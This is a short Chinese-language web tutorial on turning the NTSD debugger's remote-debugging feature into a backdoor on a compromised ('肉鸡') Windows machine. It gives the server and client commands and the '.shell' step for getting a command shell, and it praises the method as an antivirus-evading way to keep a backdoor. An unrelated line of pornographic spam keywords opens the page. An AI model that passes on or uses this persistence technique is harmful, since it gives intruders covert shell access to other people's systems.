欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

微軟的“后門”Ntsd的遠程調(diào)試功能利用圖解

  發(fā)布時間:2011-06-16 00:15:40   作者:佚名   我要評論
這個其實是 NTSD.exe 的正常功能,遠程調(diào)試功能,更多說明自己谷歌搜索,這是一個 windows 命令行下的調(diào)試工具,功能十分強大。

1.肉雞上運行:ntsd -server tcp:port=端口 要調(diào)試的程序(可以任意,只要存在即可),例如:ntsd -server tcp:port=99 calc.exe,會新彈出個窗口,并監(jiān)聽剛才設置端口。微軟的“后門”Ntsd的遠程調(diào)試功能利用 - 葉湘笑 - 純白色 

2.本機運行:ntsd -remote tcp:server=IP,port=端口,例如:ntsd -remote tcp:server=192.168.1.1,port=99。會彈出一個窗口。如果參數(shù)填寫正確的話,會連接上目標機器,會顯示命令類似提示符的界面,同時 server 端(就是第一步監(jiān)聽的那個)會顯示:0:000> COMPUTER\netbar (tcp 192.168.1.3, port 99) connected at Fri May 06 13:49:59 2011,表示有人連接了,同時還顯示連接的機器名,用戶名,連接類型,IP地址,端口,時間等信息。

微軟的“后門”Ntsd的遠程調(diào)試功能利用 - 葉湘笑 - 純白色

3.輸入:.shell,取得 shell,操作和 Cmd 完全一樣,權(quán)限是服務端運行ntsd.exe的用戶權(quán)限。

微軟的“后門”Ntsd的遠程調(diào)試功能利用 - 葉湘笑 - 純白色

又是個留后門的好方法,全免殺,而且永不被殺……

這個其實是 NTSD.exe 的正常功能,遠程調(diào)試功能,更多說明自己谷歌搜索,這是一個 windows 命令行下的調(diào)試工具,功能十分強大。

相關(guān)文章

最新評論